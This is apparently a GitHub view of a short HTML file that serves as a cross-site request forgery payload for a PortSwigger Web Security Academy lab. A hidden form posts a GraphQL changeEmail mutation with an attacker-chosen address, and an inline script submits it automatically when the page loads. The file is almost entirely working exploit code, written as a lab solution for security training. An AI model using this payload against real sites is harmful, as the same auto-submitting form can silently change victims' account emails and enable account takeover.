-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path.submit-CSRF-Example.html
13 lines (12 loc) · 1.07 KB
/
.submit-CSRF-Example.html
1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
<form action="https://0aa900b403e892c982131a7900f600c7.web-security-academy.net/graphql/v1" method="POST">
<input type="hidden" name="query"
value="mutation changeEmail($input:ChangeEmailInput!){changeEmail(input: $input){email}}

" />
<input type="hidden" name="operationName" value="changeEmail" />
<input type="hidden" name="variables"
value="{"input":{"email":"dude@email.com"}}" />
<script>
document.forms[0].submit();
</script>
</form>
</html>